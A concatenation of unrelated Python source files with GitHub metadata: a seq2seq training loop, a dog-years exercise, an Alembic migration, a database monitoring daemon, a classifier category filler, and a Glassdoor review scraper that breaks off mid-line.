args_feeder.multi_task_ratio if self.multi_task_ratio == 1: log_print(self.train_log_path, "Running single-main-task experiment...") self.task = "Single-Main" self.FLAG = "main-task (single)" elif self.multi_task_ratio == 0: log_print(self.train_log_path, "Running single-auxiliary-task experiment...") self.task = "Single-Auxiliary" self.FLAG = "aux-task (single)" else: log_print(self.train_log_path, "Running multi-task experiment...") self.task = "Multi" self.FLAG = "main-task (multi)" # data self.data_container = args_feeder.data_container self.train_iter, self.valid_iter, self.test_iter = generate_batch_iterators(self.data_container, self.args_feeder.batch_size, self.args_feeder.device, src_lang=self.args_feeder.src_lang) for (name, field) in self.data_container.fields: if name == self.args_feeder.src_lang: self.src_field = field elif name == self.args_feeder.trg_lang: self.trg_field = field elif name == self.args_feeder.auxiliary_name: self.auxiliary_field = field # teacher forcing self.tfr = 0.8 # loss function self.loss_function = self.construct_loss_function() # translator self.translator = Seq2SeqTranslator(self.args_feeder.quiet_translate) # beam search self.turn_on_beam = False def run(self, burn_in_epoch): try: for epoch in range(self.train_memory_bank.total_epochs): self.train_memory_bank.n_epoch = epoch # save no results the burn-in period, recall Bayesian Modelling if epoch <= burn_in_epoch: log_print(self.train_log_path, "Renew Evaluation Records in the Burning Phase...") # abandon the best checkpoint in early stage self.eval_memory_bank.best_valid_loss = float('inf') self.eval_memory_bank.best_valid_acc = 0 self.eval_memory_bank.early_stopping_patience = self.early_stopping_patience if self.eval_memory_bank.early_stopping_patience == 0: log_print(self.train_log_path, "Early Stopping!") break start_time = time.time() self.tfr = max(1 - (float(10 + epoch * 1.5) / 50), 0.2) train_loss = self.train() end_time = time.time() epoch_mins, epoch_secs = self.epoch_time(start_time, end_time) log_print(self.train_log_path, f'Epoch: {epoch + 1:02} | Time: {epoch_mins}m {epoch_secs}s') log_print(self.train_log_path, f'\tTrain Loss: {train_loss:.3f} | Train PPL: {math.exp(train_loss):7.3f}') # log_print(self.train_log_path, f'\t Val. Loss: {valid_loss:.3f} | ' # f'Val. Acc: {valid_acc:.3f} | ' # f'Val. PPL: {math.exp(valid_loss):7.3f}') except KeyboardInterrupt: log_print(self.train_log_path, "Exiting loop") @staticmethod def epoch_time(start_time, end_time): """ Args: start_time: end_time: """ elapsed_time = end_time - start_time elapsed_mins = int(elapsed_time / 60) elapsed_secs = int(elapsed_time - (elapsed_mins * 60)) return elapsed_mins, elapsed_secs def update(self, valid_loss, valid_acc): """ Args: valid_loss: current validation loss valid_acc: current validation accuracy """ valid_criterion = self.args_feeder.valid_criterion assert valid_criterion in ['LOSS', 'ACC'] log_print(self.train_log_path, "\n---------------------------------------") log_print(self.train_log_path, "[Epoch: {}][Validatiing...]".format(self.train_memory_bank.n_epoch)) # For Validation Loss if valid_loss <= self.eval_memory_bank.best_valid_loss: log_print(self.train_log_path, '\t\t Better Valid Loss! (at least equal)') self.eval_memory_bank.best_valid_loss = valid_loss if valid_criterion == 'LOSS': torch.save(self.model.state_dict(), 'experiments/exp' + str(self.train_memory_bank.exp_num) + '/loss-model-seq2seq.pt') # restore full patience if obtain new minimum of the loss self.eval_memory_bank.early_stopping_patience = self.early_stopping_patience else: self.eval_memory_bank.early_stopping_patience = \ max(self.eval_memory_bank.early_stopping_patience - 1, 0) # cannot be lower than 0 # For Validation Accuracy if valid_acc >= self.eval_memory_bank.best_valid_acc: log_print(self.train_log_path, '\t\t Better Valid Acc! (at least equal)') self.eval_memory_bank.best_valid_acc = valid_acc self.eval_memory_bank.acc_valid_loss = valid_loss self.eval_memory_bank.best_valid_epoch = self.train_memory_bank.n_epoch self.eval_memory_bank.best_train_step = self.train_memory_bank.n_steps if valid_criterion == 'ACC': torch.save(self.model.state_dict(), 'experiments/exp' + str(self.train_memory_bank.exp_num) + '/acc-model-seq2seq.pt') log_print(self.train_log_path, f'\t Early Stopping Patience: ' f'{self.eval_memory_bank.early_stopping_patience}/{self.early_stopping_patience}') log_print(self.train_log_path, f'\t Val. Loss: {valid_loss:.3f} | Val. Acc: {valid_acc:.3f} | Val. PPL: {math.exp(valid_loss):7.3f}') log_print(self.train_log_path, f'\t BEST. Val. Loss: {self.eval_memory_bank.best_valid_loss:.3f} | ' f'BEST. Val. Acc: {self.eval_memory_bank.best_valid_acc:.3f} | ' f'Val. Loss: {self.eval_memory_bank.acc_valid_loss:.3f} | ' f'BEST. Val. Epoch: {self.eval_memory_bank.best_valid_epoch} | ' f'BEST. Val. Step: {self.eval_memory_bank.best_train_step}') log_print(self.train_log_path, "---------------------------------------\n") def update_aux(self, valid_acc_aux): if valid_acc_aux >= self.eval_memory_bank.best_valid_acc_aux: self.eval_memory_bank.best_valid_acc_aux = valid_acc_aux log_print(self.train_log_path, '\t\t Better Valid Acc on Auxiliary Task! (at least equal)') log_print(self.train_log_path, f'\tBEST. Val. Acc Aux: {self.eval_memory_bank.best_valid_acc_aux:.3f}') log_print(self.train_log_path, "---------------------------------------\n") @staticmethod def fix_output_n_trg(output, trg): """Remove first column because they are <sos> symbols Args: output: [trg len, batch size, output dim] trg: [trg len, batch size] """ output_dim = output.shape[-1] output = output[1:].view(-1, output_dim) # [(trg len - 1) * batch size, output dim] trg = trg[1:].view(-1) # [(trg len - 1) * batch size] return output, trg def construct_loss_function(self): loss_criterion = nn.NLLLoss(ignore_index=self.args_feeder.trg_pad_idx) if self.task == "Multi": return lambda output, output_aux, trg, trg_aux: \ (self.multi_task_ratio * loss_criterion(output, trg)) + \ ((1 - self.multi_task_ratio) * loss_criterion(output_aux, trg_aux)) else: return loss_criterion def compute_loss(self, output, trg): if isinstance(output, tuple) and isinstance(trg, tuple): assert self.task == "Multi" output, output_aux, trg, trg_aux = output[0], output[1], trg[0], trg[1] output, trg = self.fix_output_n_trg(output, trg) output_aux, trg_aux = self.fix_output_n_trg(output_aux, trg_aux) return self.loss_function(output, output_aux, trg, trg_aux) else: output, trg = self.fix_output_n_trg(output, trg) return self.loss_function(output, trg) def train(self): self.model.train() self.model.teacher_forcing_ratio = self.tfr log_print(self.train_log_path, "[Train]: Current Teacher Forcing Ratio: {:.3f}".format(self.model.teacher_forcing_ratio)) if self.args_feeder.beam_size > 1: if self.task == "Multi": for de in self.model.decoder_list: de.turn_on_beam = False else: self.model.decoder.turn_on_beam = False # turn off beam search during training epoch_loss = 0 for i, batch in enumerate(self.train_iter): src, src_lens = getattr(batch, self.args_feeder.src_lang) trg, trg_lens = getattr(batch, self.args_feeder.trg_lang) self.optimizer.zero_grad() if self.task == 'Multi': trg_aux, trg_lens_aux = getattr(batch, self.args_feeder.auxiliary_name) output, pred, output_aux, pred_aux = self.model(src, src_lens, trg, trg_aux) loss = self.compute_loss((output, output_aux), (trg, trg_aux)) else: output, pred = self.model(src, src_lens, trg) loss = self.compute_loss(output, trg) loss.backward() torch.nn.utils.clip_grad_norm_(self.model.parameters(), 1) # clip = 1 self.optimizer.step() epoch_loss += loss.item() running_loss = epoch_loss / (i + 1) self.train_memory_bank.n_steps += 1 # print every ${report_interval} batches (${report_interval} steps) if self.train_memory_bank.n_steps % self.train_memory_bank.report_interval == 0: lr = -1 for param_group in self.optimizer.param_groups: lr = param_group['lr'] n_examples = len(self.data_container.dataset['train'].examples) log_print(self.train_log_path, '[Epoch: {}][#examples: {}/{}][#steps: {}]'.format( self.train_memory_bank.n_epoch, (i + 1) * self.args_feeder.batch_size, n_examples, self.train_memory_bank.n_steps)) log_print(self.train_log_path, f'\tTrain Loss: {running_loss:.3f} | ' f'Train PPL: {math.exp(running_loss):7.3f} ' f'| lr: {lr:.3e}') # eval the validation set for every * steps if (self.train_memory_bank.n_steps % (10 * self.train_memory_bank.report_interval)) == 0: log_print(self.train_log_path, '-----Val------') valid_loss, valid_acc, valid_acc_aux = self.evaluate(is_test=False) # log_print(self.train_log_path, '-----Tst------') # self.evaluate(is_test=True) self.update(valid_loss, valid_acc) if self.task == 'Multi': self.update_aux(valid_acc_aux) self.scheduler.step(valid_acc) # scheduled on validation acc # back to teacher forcing (turn off beam decoding) if self.args_feeder.beam_size > 1: if self.task == "Multi": for de in self.model.decoder_list: de.turn_on_beam = False else: self.model.decoder.turn_on_beam = False # turn off beam search during training self.model.train() return epoch_loss / len(self.train_iter) def evaluate(self, is_test=False, output_file=None, trans_only=False): self.model.eval() self.model.teacher_forcing_ratio = 0 # turn off teacher forcing epoch_loss = 0 correct = 0 correct_aux = 0 iterator = self.valid_iter if not is_test else self.test_iter if self.turn_on_beam: if self.task == "Multi": for de in self.model.decoder_list: de.turn_on_beam = True beam_size = de.beam_size else: self.model.decoder.turn_on_beam = True # turn on beam search during evaluation beam_size = self.model.decoder.beam_size log_print(self.train_log_path, "Start beam (size={}) searching ...".format(beam_size)) with torch.no_grad(): for i, batch in enumerate(iterator): src, src_lens = getattr(batch, self.args_feeder.src_lang) trg, trg_lens = getattr(batch, self.args_feeder.trg_lang) if self.task == 'Multi': trg_aux, trg_lens_aux = getattr(batch, self.args_feeder.auxiliary_name) output, pred, output_aux, pred_aux = self.model(src, src_lens, trg, trg_aux) loss = self.compute_loss((output, output_aux), (trg, trg_aux)) if not trans_only else float("Inf") correct_aux += self.translator.translate(pred_aux, trg_aux, trg_field=self.auxiliary_field) else: output, pred = self.model(src, src_lens, trg) loss = self.compute_loss(output, trg) if not trans_only else float("Inf") epoch_loss += loss.item() if not trans_only else float("Inf") # compute acc through seq2seq translation correct += self.translator.translate(pred, trg, trg_field=self.trg_field, output_file=output_file) epoch_loss = epoch_loss / len(iterator) n_examples = len(self.data_container.dataset['valid'].examples) if not is_test \ else len(self.data_container.dataset['test'].examples) flag = "TEST" if is_test else "VAL" log_print(self.train_log_path, '[{}]: The number of correct predictions ({}): {}/{}' .format(flag, self.FLAG, correct, n_examples)) if self.task == 'Multi': log_print(self.train_log_path, '[{}]: The number of correct predictions (aux-task (multi)): {}/{}' .format(flag, correct_aux, n_examples)) acc = correct / n_examples acc_aux = correct_aux / n_examples # if single-task, then just zero self.model.teacher_forcing_ratio = self.tfr # restore teacher-forcing ratio return epoch_loss, acc, acc_aux def load_best_model(self): self.model.load_state_dict(torch.load('experiments/exp' + str(self.args_feeder.exp_num) + '/acc-model-seq2seq.pt')) def best_model_output(self, enable_acc_act=True, test_ref_dict=None, beam_size=1, score_choice="N", length_norm_ratio=0.7): self.load_best_model() if self.task == "Multi": for de in self.model.decoder_list: de.beam_size = beam_size de.score_choice = score_choice de.length_norm_ratio = length_norm_ratio else: self.model.decoder.beam_size = beam_size self.model.decoder.score_choice = score_choice self.model.decoder.length_norm_ratio = length_norm_ratio self.turn_on_beam = True log_print(self.train_log_path, "Scoring Method: {}".format(score_choice)) log_print(self.train_log_path, "Length normalisation ratio: {}".format(length_norm_ratio)) # evaluate val set f = open(self.args_feeder.valid_out_path, 'w') f.write("PRED\tREF\n") valid_loss, valid_acc, valid_acc_aux = self.evaluate(is_test=False, output_file=f) f.close() # evaluate tst set f = open(self.args_feeder.test_out_path, 'w') f.write("PRED\tREF\n") test_loss, test_acc, test_acc_aux = self.evaluate(is_test=True, output_file=f) f.close() # save model settings with open("experiments/exp{}/settings".format(self.args_feeder.exp_num), "w+") as f: f.write("Direction\t{}-to-{}\n".format(self.args_feeder.src_lang, self.args_feeder.trg_lang)) f.write("Task\t{}\n".format(self.task)) f.write("MTR\t{}\n".format(self.multi_task_ratio)) f.write("#Params\t{}\n".format(self.num_params)) if self.task == "Multi": f.write("Auxiliary\t{}".format(self.args_feeder.auxiliary_name)) # save evaluation results eval_results = pd.DataFrame(columns=["Loss", "ACC"], index=["Valid", "Test"]) eval_results["Loss"] = [valid_loss, test_loss] eval_results["ACC"] = [valid_acc, test_acc] # save auxiliary task results if self.task == 'Multi': eval_results["ACC-aux"] = [valid_acc_aux, test_acc_aux] # acc+ where applicable if test_ref_dict is not None: test_out_df = pd.read_csv(self.args_feeder.test_out_path, sep='\t') test_srcs = [] for i, batch in enumerate(self.test_iter): src, src_lens = getattr(batch, self.args_feeder.src_lang) src = src[1:].permute(1, 0) for j in range(src.shape[0]): src_j = src[j, :] src_j_toks = [] for t in src_j: tok = self.src_field.vocab.itos[t] if tok == '<eos>': break else: src_j_toks.append(tok) test_srcs.append(''.join(src_j_toks)) test_out_df['SRC'] = test_srcs count = 0 for i, dp in test_out_df.iterrows(): if dp["PRED"] in test_ref_dict[dp["SRC"]]: count += 1 eval_results["ACC+"] = ["NA", count / len(test_out_df)] # acc-act where applicable if enable_acc_act: act = AlternatingCharacterTable(act_path=dict_act_path) valid_out = act.tsv_to_df(self.args_feeder.valid_out_path) test_out = act.tsv_to_df(self.args_feeder.test_out_path) results_valid = act.compute_ACC_ACT(valid_out) results_test = act.compute_ACC_ACT(test_out) eval_results["ACC-ACT"] = [results_valid["acc-act"], results_test["acc-act"]] eval_results["Replaced"] = [results_valid["replaced"], results_test["replaced"]] log_print(self.train_log_path, eval_results) eval_results.to_csv("experiments/exp" + str(self.args_feeder.exp_num) + "/eval.results", sep="\t") def translate_only(self, beam_size=1, score_choice="N", length_norm_ratio=0.7, is_test=False, max_length=None): self.load_best_model() if self.task == "Multi": for de in self.model.decoder_list: de.beam_size = beam_size de.score_choice = score_choice de.length_norm_ratio = length_norm_ratio de.max_length = max_length else: self.model.decoder.beam_size = beam_size self.model.decoder.score_choice = score_choice self.model.decoder.length_norm_ratio = length_norm_ratio self.model.decoder.max_length = max_length self.turn_on_beam = True log_print(self.train_log_path, "Scoring Method: {}".format(score_choice)) log_print(self.train_log_path, "Length normalisation ratio: {}".format(length_norm_ratio)) # evaluate val set if not is_test: f = open(self.args_feeder.valid_out_path, 'w') f.write("PRED\tREF\n") self.evaluate(is_test=False, output_file=f, trans_only=True) f.close() else: # evaluate tst set f = open(self.args_feeder.test_out_path, 'w') f.write("PRED\tREF\n") self.evaluate(is_test=True, output_file=f, trans_only=True) f.close() f = open(self.args_feeder.test_out_path + '.src', 'w') for i, batch in enumerate(self.test_iter): src, src_lens = getattr(batch, self.args_feeder.src_lang) src = src[1:].permute(1, 0) for j in range(src.shape[0]): src_j = src[j, :] src_j_toks = [] for t in src_j: tok = self.src_field.vocab.itos[t] if tok == '<eos>': break else: src_j_toks.append(tok) f.write(''.join(src_j_toks) + "\n")
c05d8a4e840ef2afbca731b3bbb2dbae8e93ca87
d0e74db58ce3ec48cd165070157022767f7d14f9
/exercise-3.py
b5e2d889c65ed3f72c12f257833d0cbff5c980db
[]
no_license
KelseyRocco/control-flow-lab
7cb85e1f2aeb45f8c589899e672b37917e02620c
f300f0d3bbd60dfc2cb7005742bfc0c54f7fcd06
refs/heads/main
2023-06-02T11:34:33.182219
2021-06-15T18:00:27
2021-06-15T18:00:27
377,251,502
0
0
null
null
null
null
UTF-8
Python
false
false
799
py
# exercise-03 Calculate Dog Years # Write the code that: # 1. Prompts the user to enter a dog's age in human years like this: # Input a dog's age in human years: # 2. Calculates the equivalent dog years, where: # - The first two years count as 10 years each # - Any remaining years count as 7 years each # 3. Prints the answer in the following format: # The dog's age in dog years is xx # Hint: Use the int() function to convert the string returned from input() into an integer human_years = int(input('Input a dogs age in human years: ')) if human_years == 1: human_years = human_years + 10 elif human_years == 2: human_years = human_years + 20 elif human_years > 2: human_years = (human_years * 7) + 18 print(f'You are {int(human_years)} old in dog years')
9773ec360833e6176698d87d660d3c5844e46edb
81663c7e0f7d2ebd8dd0f46766e9d9a55d2ee046
/course/my_practice/Blog_site/migrations/versions/75f97fe6d6aa_first_migration.py
7db0eaf6eacfbd47374c3d8609230544af424bb6
[]
no_license
VladyslavPodrazhanskyi/flask_blog
49f695947f3da91f73c7e7cd7d7a75d4dc59c744
5f3fb73ef70ffe4648a99bf471c3fee5dbdb21c4
refs/heads/master
2022-12-15T06:45:37.538683
2020-05-17T14:07:46
2020-05-17T14:07:46
232,903,749
0
0
null
2022-12-08T01:06:07
2020-01-09T20:53:18
Python
UTF-8
Python
false
false
1,650
py
"""first migration Revision ID: 75f97fe6d6aa Revises: Create Date: 2020-05-16 18:10:54.256179 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '75f97fe6d6aa' down_revision = None branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('users', sa.Column('id', sa.Integer(), nullable=False), sa.Column('profile_image', sa.String(length=20), nullable=False), sa.Column('email', sa.String(length=64), nullable=True), sa.Column('username', sa.String(length=64), nullable=True), sa.Column('password_hash', sa.String(length=128), nullable=True), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_users_email'), 'users', ['email'], unique=True) op.create_index(op.f('ix_users_username'), 'users', ['username'], unique=True) op.create_table('blog_post', sa.Column('id', sa.Integer(), nullable=False), sa.Column('user_id', sa.Integer(), nullable=False), sa.Column('date', sa.DateTime(), nullable=False), sa.Column('title', sa.String(length=140), nullable=False), sa.Column('text', sa.Text(), nullable=False), sa.ForeignKeyConstraint(['user_id'], ['users.id'], ), sa.PrimaryKeyConstraint('id') ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table('blog_post') op.drop_index(op.f('ix_users_username'), table_name='users') op.drop_index(op.f('ix_users_email'), table_name='users') op.drop_table('users') # ### end Alembic commands ###
[ "https://[email protected]" ]
c24108115824846270de2c3fb788e3860aee965a
0750ac688e156932ce004aa40fac7388878ac647
/monitor/monitor.py
ce82ae3df0d4e044b09907243562d81c0f7f934f
[]
no_license
alexandalee/pymonitor
5126b877d258418edba47dca8e716965b4ff80e3
a81acad1e67d49085564a48860a36472d3c439bb
refs/heads/master
2021-01-01T19:15:56.935462
2015-05-08T10:33:04
2015-05-08T10:33:04
35,099,945
0
0
null
null
null
null
UTF-8
Python
false
false
3,656
py
#-*- coding:utf-8 -*- __author__ = 'likun' import os import sys import time import inspect import logging import traceback import rrtdb.normal as rrtdb import rrtnet import rrtcfg class Monitor(): def __init__(self): self.config = None self.isAlive = True self.logger = self._getLogger() def _getLogger(self): logger = logging.getLogger('[Monitor]') this_file = inspect.getfile(inspect.currentframe()) dirpath = os.path.abspath(os.path.dirname(this_file)) handler = logging.FileHandler(os.path.join(dirpath, "monitor.log")) formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s') handler.setFormatter(formatter) logger.addHandler(handler) logger.setLevel(logging.INFO) return logger def start(self): ##################################### self.logger.error("monitor is starting....") try: # 检查网络 while True: if rrtnet.ping(): self.logger.error("ping back.") break else: self.logger.error('ping time out.') time.sleep(30) continue # 获取数据库配置信息 self.config = rrtnet.config() self.logger.error('loading config...') # 处理特殊任务 self.procTask() # 处理常规提交 self.procNormal() except: errinfo = traceback.format_exc() print errinfo self.logger.error(errinfo) def procTask(self): """ 处理特殊命令 """ cmmd = rrtnet.task() self.logger.error('loading task...') if not cmmd: print 'no task' self.logger.error('no task.') else: # 初始化数据库 rrtdb.init(self.config) rrtdb.setLastTime(cmmd['start']) while(True): # 一次取100条数据 rows = rrtdb.query(cmmd['end']) #print 'get %d rows'% len(rows) if len(rows) <= 0: break for row in rows: rst = rrtnet.send(row, False) #print rst ltt = row['opttime'].strip('000') if str(rst)<>'null': rrtdb.setLastTime(ltt) time.sleep(0.2) # 更新任务时间 fresh = { 'id':cmmd['id'], 'now':ltt } rrtnet.taskover(fresh) del rows return True def procNormal(self): """ 正常处理 """ # 初始化数据库 rrtdb.init(self.config) self.logger.error('init db') # 获取最后访问时间 arch = rrtnet.archive() self.logger.error('loading archive...') rrtdb.setArchive(arch) # 开始 while self.isAlive: self.logger.error('pid: %s :: loop...'%(str(os.getpid()))) rows = rrtdb.query() print 'get %d rows'% len(rows), print time.strftime('%H:%M:%S') if len(rows) == 0: time.sleep(30); continue for row in rows: rst = rrtnet.send(row) ltt = row['opttime'].strip('000') if str(rst)<>'null': rrtdb.setLastTime(ltt) time.sleep(0.2) del rows return True def stop(self): self.isAlive = False if __name__=='__main__': mntr = Monitor() mntr.start()
7e1494da693f73f9ed9861d391c4d70b3a547db3
eddba20dfd883e6ac710fd7c7035a9da1a06ff96
/analysis/NewClassifierBasedCategoryFiller.py
4a5c468a6ffecefb7d6ecaca7a6a97254aca1d84
[]
no_license
philippwindischhofer/HiggsPivoting
cc64ea6f75919c78a88ae4a182e30eb6f2669767
c103de67d4c8358aba698ecf4b1491c05b8f6494
refs/heads/paper
2022-11-27T18:03:17.491300
2020-04-15T14:39:43
2020-04-15T14:39:43
193,477,990
3
0
null
2022-11-21T21:31:39
2019-06-24T09:46:32
Python
UTF-8
Python
false
false
3,572
py
import numpy as np import pandas as pd from analysis.Category import Category from base.Configs import TrainingConfig from plotting.ModelEvaluator import ModelEvaluator from training.DataFormatters import TrainingSample class ClassifierBasedCategoryFiller: @staticmethod def _sigeff_range_to_score_range(all_signal_pred, all_signal_weights, sigeff_range): return (ModelEvaluator._weighted_percentile(all_signal_pred, 1 - sigeff_range[0], weights = all_signal_weights), ModelEvaluator._weighted_percentile(all_signal_pred, 1 - sigeff_range[1], weights = all_signal_weights)) @staticmethod def create_classifier_category(mcoll, sig_process_data, sig_process_names, bkg_process_data, bkg_process_names, classifier_sigeff_range = (1.0, 0.0), nJ = 2): # make sure to base all selections only on signal events with the correct number of jets sig_process_data = [cur_data.loc[cur_data["nJ"] == nJ] for cur_data in sig_process_data] bkg_process_data = [cur_data.loc[cur_data["nJ"] == nJ] for cur_data in bkg_process_data] # convert them to TrainingSamples as well sig_process_TrainingSamples = [TrainingSample.fromTable(cur_data) for cur_data in sig_process_data] bkg_process_TrainingSamples = [TrainingSample.fromTable(cur_data) for cur_data in bkg_process_data] all_signal_TrainingSample = TrainingSample.fromTable(pd.concat(sig_process_data)) # obtain the classifier predictions on all samples sig_process_preds = [mcoll.predict(cur_data)[:, 1] for cur_data in sig_process_data] bkg_process_preds = [mcoll.predict(cur_data)[:, 1] for cur_data in bkg_process_data] all_signal_pred = np.concatenate(sig_process_preds, axis = 0) # first, determine the cuts on the classifier based on the asked-for signal efficiency classifier_range = ClassifierBasedCategoryFiller._sigeff_range_to_score_range(all_signal_pred, all_signal_weights = all_signal_TrainingSample.weights, sigeff_range = classifier_sigeff_range) print("translated signal efficiency range ({}, {}) to classifier output range ({}, {})".format(classifier_sigeff_range[0], classifier_sigeff_range[1], classifier_range[0], classifier_range[1])) retcat = Category("clf_{:.2f}_{:.2f}".format(classifier_sigeff_range[0], classifier_sigeff_range[1])) # then fill all events from all signal + background processes process_data = sig_process_data + bkg_process_data process_names = sig_process_names + bkg_process_names process_preds = sig_process_preds + bkg_process_preds for cur_process_data, cur_process_name, cur_pred in zip(process_data, process_names, process_preds): print("predicting on sample {} with length {}".format(cur_process_name, len(cur_process_data))) cut = np.logical_and.reduce((cur_pred > classifier_range[0], cur_pred < classifier_range[1])) assert len(cut) == len(cur_process_data) passed = cur_process_data[cut] passed = TrainingSample.fromTable(passed) # fill the category retcat.add_events(events = passed.data, weights = passed.weights, process = cur_process_name, event_variables = TrainingConfig.training_branches) print("filled {} events from process '{}'".format(sum(passed.weights), cur_process_name)) return retcat
450ff43113d7b2a34ff264bb64c3258a1dc48f6b
1c9afb2311f1e5cf8d1358569f26a81e71f89c42
/finaltest.py
199e4d6f0dea97f32345f738aa6ed98271f564c9
[]
no_license
pbsandjay/Glassdoor_Scraping_Example
fb051af4d3a3933aec41bcd9817f5795c740412e
c1482e7ab4a25372a7cc8fb55960eba3cae6d495
refs/heads/master
2022-05-17T00:33:19.479014
2020-04-21T23:24:10
2020-04-21T23:24:10
257,739,118
0
0
null
null
null
null
UTF-8
Python
false
false
11,203
py
import urllib2, sys from bs4 import BeautifulSoup import requests from urllib2 import urlopen #Oh boy, I can't wait for this code to collapse on itself and cause a python singularity f = open('reviews.txt','r+') companyname = raw_input("Please enter company name: ") companyname = companyname .strip("\n"); req = urllib2.Request("https://www.google.com/search?q=" + companyname + "%20glassdoor%20reviews&rct=j", headers={"User-Agent" : "Magic Browser"}) con = urllib2.urlopen(req) webContent = con.read() appendStartIndex = webContent.find ("https://www.glassdoor.com/Reviews/") appendEndIndex = webContent.find(".htm") url = webContent[appendStartIndex: appendEndIndex] url2 = url + ".htm" #url = raw_input("Please enter the URL of the website you want to scrape reviews from: ") site = url2 hdr = {"User-Agent":"Magic Browser"} req = urllib2.Request(site,headers=hdr) page = urllib2.urlopen(req) webpage = page.read() webpage1 = webpage startindex = webpage1.find ("<p class=' tightBot '>") yearsworked = webpage1.find ("<p class=' pros noMargVert truncateThis wrapToggleStr'>") pros = webpage1.find ("</p> <p class=' pros noMargVert truncateThis wrapToggleStr'>") cons = webpage1.find ("</p> <p class=' cons noMargVert truncateThis wrapToggleStr'>") while startindex!=-1: startindex += 22; yearsworked += 54; cons += 59; webpage1 = webpage1[startindex:] yearsworked = webpage1[yearsworked:] endindex = webpage1.find ("</p> <div class='description") if endindex != -1: review1 = webpage1[0:endindex] review1 = review1.replace("&nbsp",""); review1 = review1.replace("</p> </div> </div> <div class='row'> <div class='cell top '> <p class=\"strong tightVert\">Advice to Management</p> <p class=' adviceMgmt noMargVert truncateThis wrapToggleStr'>","") #print review1 startindex = webpage1.find ("<p class=' tightBot '>") yearsworked = webpage1.find ("<p class=' pros noMargVert truncateThis wrapToggleStr'>") pros = 0 startindex = 0 webpage1= webpage while startindex !=-1: pros = webpage1.find ("</p> <p class=' pros noMargVert truncateThis wrapToggleStr'>") startindex += len("<p class=' tightBot '>") pros += len("</p> <p class=' pros noMargVert truncateThis wrapToggleStr'>") webpage1 = webpage1[pros:] endindexpros = webpage1.find("</p> </div> </div> <div class='row padBotLg'> <div class='cell top '> <p class=\"strong tightVert\">") if endindexpros != -1: review2 = webpage1[0:endindexpros] review2 = review2.replace("#",""); review2 = review2.replace("&",""); review2 = review2.replace("<br/>",""); review2 = review2.replace("039;",""); review2 = review2.replace("</p> </div> </div> <div class='row'> <div class='cell top '> <p class=\"strong tightVert\">Advice to Management</p> <p class=' adviceMgmt noMargVert truncateThis wrapToggleStr'>","") #print review2 startindex = webpage1.find ("<p class=' tightBot '>") pros = webpage1.find ("</p> <p class=' pros noMargVert truncateThis wrapToggleStr'>") cons = 0 startindex = 0 webpage1 = webpage while startindex !=-1: cons = webpage1.find ("</p> <p class=' cons noMargVert truncateThis wrapToggleStr'>") startindex += len("<p class=' tightBot '>") cons += len("</p> <p class=' cons noMargVert truncateThis wrapToggleStr'>") webpage1 = webpage1[cons:] endindexcons = webpage1.find("</p> </div> </div>") if endindexcons != -1: review3 = webpage1[0:endindexcons] review3 = review3.replace("<br/>",""); review3 = review3.replace("&#034",""); review3 = review3.replace("&#039;",""); review3 = review3.replace("</p> </div> </div> <div class='row'> <div class='cell top '> <p class=\"strong tightVert\">Advice to Management</p> <p class=' adviceMgmt noMargVert truncateThis wrapToggleStr'>","") #print review3 startindex = webpage1.find ("<p class=' tightBot '>") cons = webpage1.find ("</p <p class=' cons nomargVert truncateThis wrapToggleStr'>") letstrythis = 0 for i in range(0,5000): # Number of pages plus one #companyname = raw_input("Please enter company name: ") while i !=-1: companyname = companyname.strip("\n"); req = urllib2.Request("https://www.google.com/search?q=" + companyname + "%20glassdoor%20reviews&rct=j", headers={"User-Agent" : "Magic Browser"}) con = urllib2.urlopen(req) webContent = con.read() appendStartIndex = webContent.find ("https://www.glassdoor.com/Reviews/") appendEndIndex = webContent.find(".htm") more_pages = "_P" url = webContent[appendStartIndex: appendEndIndex:] url2 = url + more_pages + ".htm" more_pages = "_P" letstrythis += 1 yep = ".htm" url3 = url + more_pages + str(letstrythis) + yep req = urllib2.Request(url3, headers={"User-Agent" : "Magic Browser"}) con = urllib2.urlopen(req) webContent = con.read() #r = requests.get(url3) #soup = BeautifulSoup(url3, 'html.parser') #print url3 startindex = webContent.find ("<p class=' tightBot '>") yearsworked = webContent.find ("<p class=' pros noMargVert truncateThis wrapToggleStr'>") pros = webContent.find ("</p> <p class=' pros noMargVert truncateThis wrapToggleStr'>") cons = webContent.find ("</p> <p class=' cons noMargVert truncateThis wrapToggleStr'>") while startindex!=-1: startindex += 22; yearsworked += 54; cons += 59; webContent = webContent[startindex:] yearsworked = webContent[yearsworked:] endindex = webContent.find ("</p> <div class='description") if endindex != -1: review1 = webContent[0:endindex] review1 = review1.replace("&nbsp",""); print review1 startindex = webContent.find ("<p class=' tightBot '>") yearsworked = webContent.find ("<p class=' pros noMargVert truncateThis wrapToggleStr'>") for line in f: f.write(review1) #f.close() pros = 0 startindex = 0 #webContent = webpage1 while startindex !=-1: pros = webContent.find ("</p> <p class=' pros noMargVert truncateThis wrapToggleStr'>") startindex += len("<p class=' tightBot '>") pros += len("</p> <p class=' pros noMargVert truncateThis wrapToggleStr'>") webContent = webContent[pros:] endindexpros = webContent.find("</p> </div> </div> <div class='row padBotLg'> <div class='cell top '> <p class=\"strong tightVert\">") if endindexpros != -1: review2 = webContent[0:endindexpros] review2 = review2.replace("#",""); review2 = review2.replace("&",""); review2 = review2.replace("<br/>",""); review2 = review2.replace("039;",""); review2 = review2.replace("</p> </div> </div> <div class='row'> <div class='cell top '> <p class=\"strong tightVert\">Advice to Management</p> <p class=' adviceMgmt noMargVert truncateThis wrapToggleStr'>","") print review2 startindex = webContent.find ("<p class=' tightBot '>") pros = webContent.find ("</p> <p class=' pros noMargVert truncateThis wrapToggleStr'>") for line in f: f.write(review2) #f.close() cons = 0 startindex = 0 #webContent = webpage while startindex !=-1: cons = webContent.find ("</p> <p class=' cons noMargVert truncateThis wrapToggleStr'>") startindex += len("<p class=' tightBot '>") cons += len("</p> <p class=' cons noMargVert truncateThis wrapToggleStr'>") webContent = webContent[cons:] endindexcons = webContent.find("</p> </div> </div> </div> <div class='tbl fill outlookEmpReview'>") if endindexcons != -1: review3 = webContent[0:endindexcons] review3 = review3.replace("<br/>",""); review3 = review3.replace("&#034",""); review3 = review3.replace("&#039;",""); review3 = review3.replace("</div> 